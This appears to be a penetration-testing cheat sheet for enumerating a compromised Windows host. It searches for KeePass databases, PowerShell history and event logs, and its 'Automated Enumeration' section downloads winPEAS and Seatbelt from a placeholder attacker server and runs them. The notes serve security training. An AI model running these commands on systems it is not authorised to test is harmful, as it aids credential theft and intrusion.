Local Enumeration

Username and hostname.

whoami
hostname

Group memberships of the current user.

whoami /groups

Existing users and groups.

PowerShell

Get-LocalUser
Get-LocalUser <user_name>
Get-LocalGroup
Get-LocalGroupMember <group_name>

Batch

Operating system, version and architecture.

systeminfo

Network information.

ipconfig /all
route print
netstat -ano

Installed applications.

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Running processes.

Get-Process
Get-Process <Proccess> | select Path

Search for files.

Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\xampp -Include *.bin *.txt -File -Recurse -ErrorAction SilentlyContinue

Get-ChildItem -Path C:\Users -Include *.txt -File -Force -Recurse -ErrorAction SilentlyContinue

PowerShell history.

Get-History # Get History Commands

(Get-PSReadlineOption).HistorySavePath # Get History File Path

PowerShell history event logs.

Get-WinEvent Microsoft-Windows-PowerShell/Operational | Where-Object Id -eq 4104 | ForEach-Object { $_.Message } | findstr "dave*"

Automated Enumeration

Download and execute winPEAS and Seatbelt.

iwr -uri http://<attacker_http_server>/winPEASx64.exe -Outfile winPEAS.exe
iwr -uri http://<attacker_http_server>/Seatbelt.exe -Outfile Seatbelt.exe
.\Seatbelt.exe -group=all

References

PEASS-ng/winPEAS at master · peass-ng/PEASS-ngGitHub

winPEAS

GitHub - GhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.GitHub

Seatbelt